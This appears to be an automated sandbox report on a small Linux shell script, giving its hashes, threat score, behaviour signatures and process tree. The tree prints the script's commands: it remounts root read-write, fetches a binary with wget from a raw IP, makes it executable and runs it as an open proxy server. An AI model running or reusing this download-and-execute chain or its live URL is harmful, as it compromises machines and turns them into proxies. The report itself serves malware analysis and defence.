Analysis

  • max time kernel
    1030s
  • max time network
    132s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20221111-en
  • resource tags

    arch:armhfimage:debian9-armhf-20221111-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    23-11-2022 15:40

General

  • Target

    samx.sh

  • Size

    400B

  • MD5

    6039cf7d6cc1378682e1a983fcaba7a8

  • SHA1

    3ca4e29546ca125fd98429768ae0fd44182ccdee

  • SHA256

    af2bc5dda7b0ae47a3ccd286afa17718b4e81daf944a8784e445e597dbbdcd28

  • SHA512

    4119e1787b6edcc2639f0266308aea50891e67ea23404a060dd46bea082bc26033d8aafb93c06c084c391e141f838eacf21433cf94aabf1bf1e7b8e393504253

Score
8/10

Malware Config

Signatures

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 2 IoCs

    Writes data to DNS resolver config file.

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/samx.sh
    /tmp/samx.sh
    1⤵
    • Writes file to tmp directory
    PID:374
    • /bin/sleep
      sleep 120
      2⤵
        PID:375
      • /bin/mount
        mount -no "remount,rw" /
        2⤵
        • Reads runtime system information
        PID:402
      • /bin/ping
        ping -c 4 samx-.subdomain.llzxs.com
        2⤵
        • Modifies hosts file
        • Writes DNS configuration
        PID:410
      • /usr/bin/wget
        wget -P /tmp/ http://185.135.73.148:800/ss-server
        2⤵
        • Writes file to tmp directory
        PID:411
      • /bin/sleep
        sleep 10
        2⤵
          PID:445
        • /bin/chmod
          chmod +x /tmp/ss-server
          2⤵
            PID:515
        • /bin/sed
          sed "s/ /-/g"
          1⤵
          • Reads runtime system information
          PID:405
        • /bin/grep
          grep "inet addr"
          1⤵
            PID:408
          • /bin/sed
            sed -r "s/ +inet addr:([0-9.]+) .+/\\1/g"
            1⤵
            • Reads runtime system information
            PID:409
          • /tmp/ss-server
            /tmp/ss-server -s 0.0.0.0 -p 8300 -m aes-256-cfb -k 123456
            1⤵
            • Writes DNS configuration
            PID:517

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads